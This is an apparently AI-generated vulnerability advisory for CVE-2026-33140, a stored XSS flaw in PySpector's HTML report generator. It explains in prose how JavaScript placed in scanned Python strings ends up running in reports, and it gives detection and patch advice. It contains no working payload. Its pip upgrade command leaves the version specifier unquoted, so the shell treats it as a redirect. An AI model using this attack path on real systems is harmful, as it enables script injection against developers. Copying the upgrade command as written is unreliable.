CVE-2026-33140 Overview
CVE-2026-33140 is a stored Cross-Site Scripting (XSS) vulnerability affecting PySpector, a static analysis security testing (SAST) framework designed for modern Python development workflows. The vulnerability exists in the HTML report generator component, where flagged code snippets containing JavaScript payloads are interpolated into HTML reports without proper sanitization. When a user opens a generated report in a browser, embedded malicious JavaScript executes within the browser's local file context.
Critical Impact
Attackers can craft malicious Python files that, when scanned by PySpector, inject JavaScript into the generated HTML reports. Opening these reports triggers script execution in the victim's browser, potentially leading to information theft, session hijacking, or further attacks in the local file context.
Affected Products
- PySpector versions 0.1.6 and prior
- parzivalhack pyspector (Python package)
Discovery Timeline
- 2026-03-20 - CVE CVE-2026-33140 published to NVD
- 2026-03-24 - Last updated in NVD database
Technical Details for CVE-2026-33140
Vulnerability Analysis
This stored XSS vulnerability (CWE-79) occurs in PySpector's HTML report generation process. When PySpector performs static analysis on Python source files, it identifies potentially dangerous code patterns such as calls to eval() and includes the flagged code snippets in the generated HTML report. The vulnerability stems from the report generator's failure to sanitize these code snippets before embedding them in the HTML output.
An attacker can exploit this by crafting a Python file containing JavaScript payloads within strings that PySpector will flag during analysis. For example, a string passed to eval() containing a <script> tag will be flagged as a security issue, but when included in the HTML report, the script tags are interpreted by the browser as executable JavaScript rather than display text.
The attack requires user interaction—specifically, a victim must open the malicious HTML report in a web browser. The JavaScript then executes in the browser's local file context (file:// protocol), which can provide access to local files and other sensitive information depending on browser security configurations.
Root Cause
The root cause is improper output encoding in PySpector's HTML report generator. When code snippets are extracted from scanned Python files and inserted into the HTML template, special HTML characters like <, >, &, and quotes are not properly escaped or encoded. This allows malicious content within the scanned files to break out of the intended text context and be interpreted as HTML/JavaScript by the browser.
Attack Vector
The attack follows a network-based delivery model where an attacker provides a malicious Python file to be scanned by PySpector. This could occur in several scenarios:
- Supply Chain Attack: An attacker contributes a malicious Python file to a shared repository that undergoes automated SAST scanning
- Direct File Submission: In environments where PySpector is used as a service, attackers submit crafted Python files
- Social Engineering: An attacker convinces a developer to scan a malicious file
The vulnerability allows execution of arbitrary JavaScript when the generated HTML report is viewed in a browser. While the attack requires passive user interaction (opening the report), the payloads persist in the generated reports, enabling time-delayed attacks.
The vulnerability mechanism involves malicious JavaScript payloads embedded within Python code strings that PySpector flags during analysis. When the report generator includes these flagged snippets without sanitization, the JavaScript becomes executable HTML content. For detailed technical information, refer to the GitHub Security Advisory.
Detection Methods for CVE-2026-33140
Indicators of Compromise
- HTML reports generated by PySpector versions 0.1.6 and earlier containing unescaped <script> tags or event handlers within code snippets
- Python files submitted for scanning containing suspicious JavaScript payloads within string literals
- Browser console errors or unusual network requests when opening PySpector HTML reports
- Evidence of local file access attempts from the file:// protocol context
Detection Strategies
- Implement file integrity monitoring on PySpector-generated HTML reports to detect unexpected JavaScript content
- Deploy browser-based XSS detection extensions to alert on suspicious script execution from local files
- Review submitted Python files for patterns indicative of XSS payloads before scanning
- Monitor for unusual browser behavior when accessing SAST tool outputs
Monitoring Recommendations
- Audit PySpector version deployments across development environments and CI/CD pipelines
- Implement content security policies (CSP) for HTML report viewing environments where possible
- Log and monitor access patterns to generated HTML reports for anomalous activity
- Establish baseline behavior for PySpector report generation and alert on deviations
How to Mitigate CVE-2026-33140
Immediate Actions Required
- Upgrade PySpector to version 0.1.7 or later immediately across all development environments
- Review previously generated HTML reports for potential malicious content before opening
- Temporarily disable HTML report generation if upgrade cannot be performed immediately
- Consider using alternative output formats (JSON, plain text) until patched version is deployed
Patch Information
The vulnerability has been addressed in PySpector version 0.1.7. The patch implements proper HTML encoding for code snippets included in generated reports, ensuring that special characters are escaped and cannot be interpreted as executable HTML or JavaScript. Users should update their PySpector installation using their package manager.
For complete patch details and additional security information, consult the GitHub Security Advisory GHSA-2gmv-2r3v-jxj2.
Workarounds
- Avoid opening HTML reports generated by vulnerable PySpector versions in web browsers
- Use text-only viewing methods or convert reports to plain text before review
- Implement manual HTML sanitization on generated reports using tools like DOMPurify before browser viewing
- Configure browser security settings to restrict JavaScript execution for local files
# Upgrade PySpector to patched version
pip install --upgrade pyspector>=0.1.7
# Verify installed version
pip show pyspector | grep Version
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
